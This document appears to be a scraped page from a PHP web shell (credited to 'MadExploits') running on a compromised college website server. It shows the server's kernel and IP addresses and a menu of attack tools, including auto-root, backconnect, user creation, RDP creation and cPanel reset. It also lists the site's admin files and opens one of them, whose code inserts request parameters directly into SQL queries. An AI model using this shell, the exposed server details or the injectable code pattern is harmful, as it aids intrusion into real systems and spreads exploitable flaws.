Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.188.13.212
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
np_admin /
[ HOME SHELL ]
Name
Size
Permission
Action
SpryAssets
[ DIR ]
drwxr-xr-x
ckeditor
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxr-xr-x
Logout.php
84
B
-rw-r--r--
Session_Update.php
2.58
KB
-rw-r--r--
User_Account.php
12.6
KB
-rw-r--r--
User_Profile.php
8.57
KB
-rw-r--r--
User_Profile_permmion.php
14.71
KB
-rw-r--r--
admin_home.php
2
KB
-rw-r--r--
admin_home_old.php
10.92
KB
-rw-r--r--
attand.php
9.14
KB
-rw-r--r--
college_profile.php
8.56
KB
-rw-r--r--
college_profile_edit.php
7.15
KB
-rw-r--r--
committee_member.php
9.53
KB
-rw-r--r--
committee_member_edit.php
7.74
KB
-rw-r--r--
committee_name.php
7.26
KB
-rw-r--r--
connection.php
177
B
-rw-r--r--
courses.php
8.14
KB
-rw-r--r--
courses_edit.php
6.64
KB
-rw-r--r--
databasebackup.php
3.58
KB
-rw-r--r--
databaserestore.php
2.65
KB
-rw-r--r--
error_log
1.36
KB
-rw-r--r--
foragte_password.php
307
B
-rw-r--r--
gallery.php
8.79
KB
-rw-r--r--
gallery_edit.php
6.94
KB
-rw-r--r--
index.php
2.4
KB
-rw-r--r--
login_2.php
18.94
KB
-rw-r--r--
new_notice.php
9.16
KB
-rw-r--r--
non_teaching.php
10.16
KB
-rw-r--r--
non_teaching_edit.php
8.21
KB
-rw-r--r--
principal_message.php
8.96
KB
-rw-r--r--
principal_message_edit.php
7.35
KB
-rw-r--r--
splash_view.php
7.33
KB
-rw-r--r--
teaching.php
10.14
KB
-rw-r--r--
teaching_edit.php
8.2
KB
-rw-r--r--
teching_edit.php
8.17
KB
-rw-r--r--
tender.php
8.69
KB
-rw-r--r--
update_and_delete.php
4.1
KB
-rw-r--r--
update_attand.php
6.89
KB
-rw-r--r--
update_notice.php
6.9
KB
-rw-r--r--
user_details.php
9.24
KB
-rw-r--r--
user_reg.php
4.26
KB
-rw-r--r--
validateuser.php
685
B
-rw-r--r--
view_notice.php
1.14
KB
-rw-r--r--
welcome.php
821
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : splash_view.php
<?php ob_start(); session_start(); error_reporting(4); include("includes/connection.php"); include_once("includes/function.inc.php"); validateUser(); $user=$_SESSION['UserId']; extract($_POST); $msg=$_GET['msg']; $error_msg=""; if(isset($_POST['submit'])){ $title=$_POST['notice_title']; $pic=$_FILES['file']['name']; if ($_FILES['file']['error'] !== UPLOAD_ERR_OK) { die("Upload failed with error " . $_FILES['file']['error']); }else{ if($title!="" && $pic!=""){ $pic=$_FILES['file']['name']; $ext=pathinfo($pic,PATHINFO_EXTENSION); $ext_lower=strtolower($ext); if($ext_lower == "pdf" || $ext_lower == "jpeg"|| $ext_lower == "jpg" ){ $pic=time().".$ext"; $date_info=date('Y-m-d'); move_uploaded_file($_FILES['file']['tmp_name'],"upload/".$pic); $query="insert into notice(title,file,date) values('$title','$pic','$date_info')"; $rs=mysql_query($query)or die(mysql_error()); mysql_query("insert into upload_info(user,title,file,date) values('$user','$title','$pic','$date_info')")or die(mysql_error()); header("location:new_notice.php?msg=Notice Successfully Uploaded!!"); }else{ $error_msg="Invalid Extension. Doc And Pdf Accaptable!!"; } }else{ $error_msg="Error To upload file Require field not filled properly!!"; } } } $id=$_GET["id"]; $edit=$_GET["edit"]; if($id!="" && $edit!=""){ if($edit=="delete"){ $delete_info=mysql_query("select * from notice where id='$id'"); $delete_data=mysql_fetch_array($delete_info); $file_name=$delete_data['file']; $query="delete from notice where id='$id'"; $rs=mysql_query($query)or die("Error please Try again..."); //unlink('upload/'.$file_name)or die("Error To Delete File"); header("location:new_notice.php?msg=Notice has been deleted!!"); }if($edit=="update"){ header("location:update_notice.php?id=$id"); } } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Admin Shri Kute Hotel</title> <link href="css/mystyle.css" rel="stylesheet" type="text/css" /> <script language="javascript"> function file_upload() { var fup = document.getElementById('file'); if((Math.round(document.getElementById("file").files[0].size)/(1024*1024)) > 16) { alert('Document Exceeding Max Size Limit (2MB)!!'); return false; } var fileName = fup.value; var title=document.getElementById("notice_title"); var title_value=title.value; if(title_value==""){ alert("Fill The Title Field!!!"); title.focus(); return false; } if(fileName!=""){ var ext = fileName.substring(fileName.lastIndexOf('.') + 1); if(ext == "PDF" || ext == "pdf" || ext == "JPEG" || ext == "jpeg") { return true; } else { alert("Only Docs and Pdf Extension Accaptable!!"); fup.focus(); return false; } }else{ alert("Choose A File to Upload!!"); fup.focus(); return false; } } if((Math.round(document.getElementById("file1").files[0].size)/(1024*1024)) > 4) { alert('Document is not UPLOADED. Maximum file size is restricted to 2MB.Please try again Uploading other document!!'); return false; } </script> <style> .cur{ cursor:pointer; } </style> </head> <body> <div class="outer"> <?php include("includes/header.inc.php"); ?> <div class="page"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td height="400" align="center" valign="middle"><form id="form1" name="form1" method="post" action="" enctype="multipart/form-data" onsubmit="return file_upload()"> <table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" class="table-border"> <tr> <td class="tble-heading" colspan="3"></td> </tr> <tr> <td colspan="2"> </td> <td width="13%"> </td> </tr> <tr> <td colspan="3" align="center"><table width="99%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td><div class="tab-heading">New Notice</div></td> </tr> <tr> <td height="212" align="center" class="tble-cntent"><table width="100%" border="0" cellpadding="0" cellspacing="0" class="content"> <tr> <td height="94" align="center" valign="top"><table width="60%" border="0" cellpadding="3" cellspacing="0" class="tble-cntent"> <tr> <td width="50%" align="center" valign="top" class="tab-heading-sml">Title</td> <td width="20%" align="center" valign="top" class="tab-heading-sml">Date</td> <td width="10%" align="center" valign="top" class="tab-heading-sml">Edit</td> <td width="10%" align="center" valign="top" class="tab-heading-sml">View</td> <td width="10%" align="center" valign="top" class="tab-heading-sml">Delete</td> </tr> <?php $info=mysql_query("select * from notice order by id desc"); while($data=mysql_fetch_array($info)) { ?> <tr> <td align="left" valign="middle"><?php echo $data['title'];?></td> <td align="center" valign="middle"><?php echo $data['date'];?></td> <td align="center" valign="middle"> <a href="new_notice.php?id=<?php echo $data['id'];?>&edit=update"><img src="images/edit_icon.png" width="16" height="16" onclick="return confirm('You Want To Edit This Data?') "/></a></td> <td align="center" valign="middle"><a href="view_notice.php?id=<?php echo $data['id'];?>"><img src="images/view_icon.gif" width="16" height="16" /></a></td> <td align="center" valign="middle"><a href="new_notice.php?id=<?php echo $data['id'];?>&edit=delete"><img src="images/delete.jpeg" width="16" height="16" onclick="return confirm('You Want To Delete This Document For Notice?')"/></a></td> </tr> <?php } ?> <tr> <td align="left" valign="top"> </td> <td align="left" valign="top"> </td> <td align="center" valign="top"> </td> <td align="center" valign="top"> </td> </tr> </table></td> </tr> <tr> <td height="15" align="center" valign="top"> </td> </tr> </table></td> </tr> <tr> <td> </td> </tr> </table></td> </tr> <tr> <td width="72%" height="50"> </td> <td width="15%"> </td> <td><div class="exit"><a href="welcome.php">Exit</a></div></td> </tr> </table> </form> </td> </tr> </table> </div> <?php include("includes/footer.inc.php"); ?> <script type="text/javascript"> var TabbedPanels1 = new Spry.Widget.TabbedPanels("TabbedPanels1"); </script> </div> </body> </html>
Close